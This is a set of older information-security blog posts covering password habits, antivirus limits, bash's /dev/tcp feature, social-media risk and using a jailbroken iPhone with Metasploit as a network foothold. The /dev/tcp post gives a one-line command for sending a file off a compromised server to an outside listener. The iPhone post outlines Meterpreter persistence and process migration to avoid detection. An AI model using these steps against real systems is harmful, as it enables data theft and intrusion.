Posted: April 10th, 2010 | Author: Matt | Filed under: Brain Dump, InfoSec | Tags: back to basics, InfoSec, passwords, query | 1 Comment »
Recently there has been a spate of Gmail accounts being compromised by what sounds like poor passwords. This begs the question what are we doing wrong ? I’ve come to the following conclusions:
- We’re choosing poor passwords to begin with.
– We’re using shady third party providers for some reason.
– We’re using insecure methods to check mail.
– Someone somewhere knows something we don’t
I know I’m stating the obvious here, but for the sake of my sanity I’m going to go through my process for choosing a password. As much as I really like this post, I don’t believe it’s really enough. When choosing a password I’ll take a favourite phrase, generally something obscure that only I will know. And yes, some of the time it’s related to the site I am saving a password for. Instead of rambling on about some obscure phrase only I know let’s take an example.
I have just created a Twitter account for @leethaX0r69 which I am going to use as a C&C page for my …wait…er..plans for world domination should not be published. Regardless. I’ll take that account and come up with something like “Leet HaX0r is now on Twitter”. From that phrase I’ll take the first letter of each word and get “LHinoT” which is pretty good (not really). Now let’s add a little spice into the mix and get “LH1n0T” which is marginally better. Finally, some padding to get this “&LH1n0T%”. That’s not too bad now is it. Eight characters, upper and lower case with some special characters for good measure. And it’s not based on anything in a dictionary.
There are a number of trains of thought on the topic of a good password. Some think that having a standard pass{word,phrase} with a slight change depending on what site you are using is fine. I’d disagree with that simply because I don’t like the idea of sharing a common password among sites, even if there are slight changes in it.
This brings me to password managers. I’ve been using 1Password for a while now and it’s awesome. No, they don’t sponsor this blog, nor do I receive any kick backs from them. The basic idea is that I have one password to get into my 1Password database and I am then free to use extremely complex passwords for all my online stuff. Very neat. Yes, I am up a certain creek without a certain paddle if I’m stuck without my laptop but that’s what 1Password for the iPhone is for. Alas my iPhone died a horrible death and is now about to be taken apart with a screwdriver just because I can….
What do you do for passwords ?
Am I crazy doing what I’m doing ?
Let me know what you think…
And no…my password for Twitter is NOT &LH1n0T%
Or is it…
Posted: October 12th, 2009 | Author: Matt | Filed under: Brain Dump, InfoSec, malware | Tags: InfoSec, malware, rant, spit balling, stating the obvious | No Comments »
The days of signature based malware / trojan detection are over. We are now living in some of the most dangerous times to be using the Internet I consider if it’s even worth sticking around. Farming cats in the Karoo sounds like a far safer and less stressful job anyway. Long gone are the days when a cute character of the authors choosing would run across your screen and moon you. These days, with humanities greed, it’s all about how quickly and easily a 0-day can be transformed into a working exploit which can either be sent out in a (spear)phishing attack or hosted on some web server with Javascript doing the rest of the work. And the worst part of it all is that we are constantly playing catchup.
When new malware is introduced into the ecosystem that is the Internet at large, we rely on someone catching a specimen of this malware and either analyzing it themselves or sending it through to one of the big AV vendors who will analyze it and produce a signature which will then disseminate out to paying customers. This whole process leaves gaps which are filled by zombies and eventually botnets which plague not only home users, but big corporates. No one is safe.
Conficker, while a great example of what can be done by the community at large, is still very badly understood. No one seems to know why it’s out there and what it’s truly capable of. The media didn’t help us at all around April 1st either with all the hype that went around. I think the awful catch phrase of “Cyber Katrina” was thrown around with gay abandon. Please don’t get me wrong, I am not bashing the groups who worked on the Conficker Working Group, they did tremendous work. I am just worried that there is a fairly serious piece of malware floating around which no one seems to really know the capabilities of.
What are we going to do about this ? Switch to multi-engine scanning on our AV ? Move to a more proactive IDS/IPS setup ? How does this really help the little guy in the street ? Do you think Joe Average who just wants to download the lastest funny video from that site that needs that special codec from that other site that ends in .ru ? Oh wait…I’ve gone cross eyed. Am I the only person who is still worried that we are relying on vendors who’s principal goal is to make money for our anti-virus updates ? They’re not going to do anything rash are they ? Yes, they’re out to help us, but at what cost ?
I fear I may have too many questions and doubts with not enough answers. All I know is that there is a very, very wild west (and east) out there and suddenly, running my web browser in a Virtual Machine or Live CD doesn’t sound like such a bad idea.
Hold that thought, I’m going to fire up Vmware Fusion.
Posted: September 7th, 2009 | Author: Matt | Filed under: InfoSec, Tools | Tags: bash, InfoSec, tool kit | 2 Comments »
While messing around with netcat the other day for the SANS SEC560 class, Mr Skoudis mentioned a tool I’ve haven’t come across. Strange considering I’ve been mucking around with Linux for a fairly significant amount of time.
I am talking about /dev/tcp
What this nifty little “tool” allows you to do is extend bash programming into the TCP/UDP arena. You no longer have to use netcat for simple TCP/UDP testing scripts, just use /dev/tcp or /dev/udp….
Before going ahead with this you’ll want to make the character devices in /dev if they aren’t there already..
mknod /dev/tcp c 30 36
mknod /dev/udp c 30 39
It’s also worth noting that there is an issue with this on Ubuntu. You’re going to need to recompile Bash from source with the –enable-net-redirections . It’s pretty easy to do so there should be no reason not to.
The basic premise behind /dev/{tcp,udp} is you use it to read or write data from or to a remote server or service using simple bash commands and pipes.
An example would be you’re running a pen-test where you are unable to download, install or run third party applications on the compromised server. You need to get fileX off the server and have a netcat listener running on your external machine. No problem,
cat fileX > /dev/tcp/yourserver/yourport
Awesome (and I am not referring to hot dogs).
What about reading a banner from a remote server ?
cat < /dev/tcp/yourserver/yourport
After that you’re only limited by your imagination and bash scripting skills as to what you can get done with this handy little tool. I’ll leave it to you guys and gals out there to come up with some scripts of your own. Feel free to mail them through to me, I’d be very interested to see how they work.
Posted: August 20th, 2009 | Author: Matt | Filed under: Brain Dump, InfoSec | Tags: Brain Fart, InfoSec, Social Media | 1 Comment »
The very fine, red line between love and hate.
I use Twitter a lot. Some have even said that it borders on the same unhealthy addiction I harbour for Scarlett Johannson, but that’s a story for another day. That said I do not use Facebook, MySpace or any of the other big, popular, brain atrophying SocNets that plague the Internet that we all know and love today. What’s my point in all of this ? I’m going to focus on Twitter here, but the same thought processes can really be applied across the board.
Social Networks are huge at the moment. For the most part I really don’t understand them nor believe what they do to the general populace is a good thing. When was the last time you actually picked up the phone, called someone and said “Hey, we’re buddies right ? Let’s go have a cold beer and talk rubbish about something we both share a keen interest in…” ? But I digress…
I use Twitter on a daily basis. I don’t follow too many people I would call friends. 85% of my “following” is made up of people and news sources in the Information Security space. I’m not going to list them here as that would just be silly. I find it really useful because I get up to the minute news from various sources around the world on news and the like. This is great because I get two things from it,
1. Up to date news on security topics, new exploits, new documents or discussions
2. Correlation. This in itself is great. From a news article, it’s very difficult to know without digging deeper to know if that new 0-day for Openssh is real or not. With Twitter, you’ll hear about it AND get an in depth analysis from some of the biggest heads in security today. Very useful.
That said, you do get “false positives”. I have fallen prey to this a couple of times, but I’ve learned from it. The hype around the OpenSSH “0-day” that was doing the rounds a month or so prior to BH/DC. And let’s not even go near the problems with Twitter. No, wait, lets…
I could go on for a while but I won’t.
What’s my point in all of this ? Social media and security should really be mutually exclusive simple because of the inherit risks involved in the various Social Media networks these days. As security professionals and practitioners we should all be very weary of the various Social Network sites.
- Should we be using them in our “arsenal” as a source of information ?
- Should we be participating in something that is being used to attack the hosts we are working very hard to protect ?
- Should we be viewing this site that hosts malware, dodgy links (Yes, Bit.ly, we’re talking about you) ?
- Can we even use it as a source that seems to be under increasing attack from around the world ?
I do. And I find it very useful as I am sure most of the other people I follow do. So, at the end of the day, where does that leave us ?
Joe Public loves to be “social”. It’s only human nature. But that’s the problem isn’t it ? That’s the weak link. Joe Public is going to continue to use SM and because of that he’s going to continue to have his machine poked, prodded and at times pilfered by the bad guys using the same service. We can either deny this and carry on with our lives or we could setup the necessary precautions and use it to our advantage. The bad guys are…
So fire up your hardened web browser in your virtual machine that’s been setup just to run that browser and check it out. Make your own mind up. But for the love of all things holy, don’t click on that Shortened URL without thinking about it.
Posted: August 18th, 2009 | Author: Matt | Filed under: Brain Dump, InfoSec | Tags: endpoint, InfoSec, iphone, Late Night Rambling | 2 Comments »
Alternative Title: If I “rm -fr /” my iPhone, does Steve Jobs kill a kitten ?
Setup.
So I haven’t had a chance to really get “hands on” with this simply because I have zero free time at the moment so bare with me on this one.
We all know at least one annoying person with an Apple iPhone right. I know, I am that annoying person with an iPhone. They really have changed the game entirely when it comes not only to mobile handsets, but also mobile PC’s that can be placed within an environment and used as a device to pivot or maintain your foothold on that network.
Next.
Right, we have our iPhone (or I guess even your iPod touch, but I haven’t played with one of those), it has wireless. It has a nifty little power cable (or at least mine does) that’s pretty small and can be used to power the device from under a desk, in a random closet somewhere nearby or in that cable tray with a stray power box. What does that mean to you and I ? Right now ? Not much. But jailbreak the phone, stick on OpenSSH (or simply enable it in my case) and hey..what’s that ? Metasploit ?? No..surely not. Yes, ladies and gentlemen, you now have Metasploit installed and running from your iPhone. Think about that for a second. Let it really sink in.
Next.
So are you with me so far ? We have a very small device, with fairly decent WiFi capability that has the ability to stay on until such time as it’s found or the attacker decides to come back and pick it up. What can an attacker do with this ? Well, they could run any one (or many) of the built in web browser exploits and just wait. This would allow the attacker to spam anyone within the target business (anyone for a spot of spear whaling ?) and no doubt get at least one machine compromised on the network. How is this useful to the attacker ?
1. We have a remote shell on a compromised machine within the target network.
2. We could now use Meterpreter to maintain access and harvest as much information on that network as is physically possible. Believe me, this is a scary amount of information.
3. With that compromised host and the information gleaned from it, we can now deepen the foothold we have on the organization.
Next.
All of this is very scary. I’ve been experimenting with Metasploit and Meterpreter and I can say that it’s trivial to exploit the older versions of Internet Explorer. That’s one thing, but add to this the post exploitation bliss that is Meterpreter and you have a very nasty combination. The WinEnum script by Dark0perator pulls in so much useful information from the victim machine it becomes even more trivial to start building very comprehensive maps and other useful information on the target network. And the ringer ? Meterpreter runs completely from memory. It’s not going to be detected by Anti-Virus either. Fine, I will see the broken IE process and kill it ! Wrong, simply migrate the Meterpreter process from IE to something a little less suspect with the Migrate script. Beige coloured mold could do this stuff….
Done.
Yes, we’re done. We have an extremely portable device that can be used to leverage a foot hold into a target network and then not only maintain but increase that foothold. What does this mean to security professionals ? It means the attack surface is growing and generally there isn’t anything we can do about it. Why ? Have you ever tried to tell your C-level exec to switch off the WiFi on his handset ? You’re going to have another vector to worry about and it’s going to be the biggest worry of them all.
To sum it all up, end point security is tough. Very tough. But hopefully this post will do one thing (and hopefully it’s not make me look like an insane ranting person) and that’s get the thought processes going on what we can do. What policies and procedures can we implement to at least mitigate these issues ? Can we separate these devices off into their own networks ? Is this even viable in your environment ?
Unfortunately I don’t have any of the answers for this. I probably only have more questions, but to me, that’s what this is about. Asking the right questions to at least get to the answers.